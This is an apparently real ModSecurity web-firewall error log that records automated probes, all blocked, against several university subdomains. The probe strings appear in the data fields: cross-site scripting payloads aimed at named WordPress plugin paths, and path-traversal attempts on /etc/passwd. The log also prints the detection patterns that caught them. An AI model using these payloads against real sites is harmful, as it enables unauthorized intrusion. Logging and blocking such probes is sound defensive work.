[Tue Aug 29 11:54:27.111051 2023] [:error] [pid 2657] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:q: <svg/onload=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/addons/"] [unique_id "ZO16A8Co-f0AAAph8wwAAAAj"]
[Tue Aug 29 11:54:27.580976 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAApbUUMAAAAh"]
[Tue Aug 29 11:54:27.582238 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAAqeFNwAAAAx"]
[Tue Aug 29 11:54:27.583970 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAAqSwhkAAAAN"]
[Tue Aug 29 11:54:27.588614 2023] [:error] [pid 2715] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAAqb-pAAAAAu"]
[Tue Aug 29 11:54:27.590394 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAApV22QAAAAJ"]
[Tue Aug 29 11:54:27.624866 2023] [:error] [pid 2676] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:q: <svg/onload=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/addons/"] [unique_id "ZO16A8Co-f0AAAp0OFQAAAAI"]
[Tue Aug 29 11:54:27.631724 2023] [:error] [pid 2711] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAAqXyOoAAAAq"]
[Tue Aug 29 11:54:28.873048 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16BMCo-f0AAAqWwVcAAAAl"]
[Tue Aug 29 11:54:29.755027 2023] [:error] [pid 2661] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:v. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:v: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/hero-maps-pro/views/dashboard/index.php"] [unique_id "ZO16BcCo-f0AAApl@AMAAAAo"]
[Tue Aug 29 11:54:29.766583 2023] [:error] [pid 2711] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:v. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:v: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/hero-maps-pro/views/dashboard/index.php"] [unique_id "ZO16BcCo-f0AAAqXyO8AAAAq"]
[Tue Aug 29 11:54:29.799174 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:v. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:v: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/hero-maps-pro/views/dashboard/index.php"] [unique_id "ZO16BcCo-f0AAAqUB10AAAAb"]
[Tue Aug 29 11:54:29.810598 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:v. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:v: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/hero-maps-pro/views/dashboard/index.php"] [unique_id "ZO16BcCo-f0AAAqSwiAAAAAN"]
[Tue Aug 29 11:54:29.811446 2023] [:error] [pid 2662] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:v. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:v: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/hero-maps-pro/views/dashboard/index.php"] [unique_id "ZO16BcCo-f0AAApmXu8AAAAp"]
[Tue Aug 29 11:54:30.540973 2023] [:error] [pid 2714] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:v. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:v: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/hero-maps-pro/views/dashboard/index.php"] [unique_id "ZO16BsCo-f0AAAqamjEAAAAt"]
[Tue Aug 29 11:54:30.778973 2023] [:error] [pid 2649] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x5c found within ARGS:what: {\\x22call_action\\x22:\\x22x\\x22,\\x22more_data\\x22:\\x22\\x5cu003cscript>alert(document.domain)\\x5cu003c/script>\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16BsCo-f0AAApZHV8AAAAf"]
[Tue Aug 29 11:54:31.541385 2023] [:error] [pid 2649] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x5c found within ARGS:what: {\\x22call_action\\x22:\\x22x\\x22,\\x22more_data\\x22:\\x22\\x5cu003cscript>alert(document.domain)\\x5cu003c/script>\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16B8Co-f0AAApZHWAAAAAf"]
[Tue Aug 29 11:54:31.548563 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x5c found within ARGS:what: {\\x22call_action\\x22:\\x22x\\x22,\\x22more_data\\x22:\\x22\\x5cu003cscript>alert(document.domain)\\x5cu003c/script>\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16B8Co-f0AAAofnD0AAAAX"]
[Tue Aug 29 11:54:31.548932 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x5c found within ARGS:what: {\\x22call_action\\x22:\\x22x\\x22,\\x22more_data\\x22:\\x22\\x5cu003cscript>alert(document.domain)\\x5cu003c/script>\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16B8Co-f0AAAqWwV8AAAAl"]
[Tue Aug 29 11:54:31.557655 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x5c found within ARGS:what: {\\x22call_action\\x22:\\x22x\\x22,\\x22more_data\\x22:\\x22\\x5cu003cscript>alert(document.domain)\\x5cu003c/script>\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16B8Co-f0AAAoz77AAAAAS"]
[Tue Aug 29 11:54:31.661239 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x5c found within ARGS:what: {\\x22call_action\\x22:\\x22x\\x22,\\x22more_data\\x22:\\x22\\x5cu003cscript>alert(document.domain)\\x5cu003c/script>\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16B8Co-f0AAApk-VsAAAAn"]
[Tue Aug 29 11:54:31.662361 2023] [:error] [pid 2662] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><img src onerror=alert(document.domain) x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/members-list/admin/view/user.php"] [unique_id "ZO16B8Co-f0AAApmXvQAAAAp"]
[Tue Aug 29 11:54:31.667652 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><img src onerror=alert(document.domain) x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/members-list/admin/view/user.php"] [unique_id "ZO16B8Co-f0AAAqSwiUAAAAN"]
[Tue Aug 29 11:54:31.668020 2023] [:error] [pid 2711] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><img src onerror=alert(document.domain) x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/members-list/admin/view/user.php"] [unique_id "ZO16B8Co-f0AAAqXyPUAAAAq"]
[Tue Aug 29 11:54:31.670350 2023] [:error] [pid 2716] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><img src onerror=alert(document.domain) x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/members-list/admin/view/user.php"] [unique_id "ZO16B8Co-f0AAAqci6QAAAAv"]
[Tue Aug 29 11:54:31.873538 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><img src onerror=alert(document.domain) x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/members-list/admin/view/user.php"] [unique_id "ZO16B8Co-f0AAApbUU0AAAAh"]
[Tue Aug 29 11:54:32.531297 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><img src onerror=alert(document.domain) x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/members-list/admin/view/user.php"] [unique_id "ZO16CMCo-f0AAAqWwWMAAAAl"]
[Tue Aug 29 11:54:32.566909 2023] [:error] [pid 2715] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:filename: filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php"] [unique_id "ZO16CMCo-f0AAAqb-p4AAAAu"]
[Tue Aug 29 11:54:32.671488 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:filename: filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php"] [unique_id "ZO16CMCo-f0AAAnHQyUAAAAT"]
[Tue Aug 29 11:54:32.699646 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:filename: filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php"] [unique_id "ZO16CMCo-f0AAAqUB2IAAAAb"]
[Tue Aug 29 11:54:32.929309 2023] [:error] [pid 2717] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:filename: filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php"] [unique_id "ZO16CMCo-f0AAAqdblwAAAAw"]
[Tue Aug 29 11:54:32.967455 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:filename: filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php"] [unique_id "ZO16CMCo-f0AAAqeFOoAAAAx"]
[Tue Aug 29 11:54:33.531963 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16CcCo-f0AAAqUB2QAAAAb"]
[Tue Aug 29 11:54:33.551677 2023] [:error] [pid 2662] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16CcCo-f0AAApmXvcAAAAp"]
[Tue Aug 29 11:54:33.553707 2023] [:error] [pid 2713] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16CcCo-f0AAAqZuZQAAAAs"]
[Tue Aug 29 11:54:33.556220 2023] [:error] [pid 2704] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16CcCo-f0AAAqQ@t0AAAAB"]
[Tue Aug 29 11:54:33.562984 2023] [:error] [pid 2715] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:filename: filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php"] [unique_id "ZO16CcCo-f0AAAqb-qAAAAAu"]
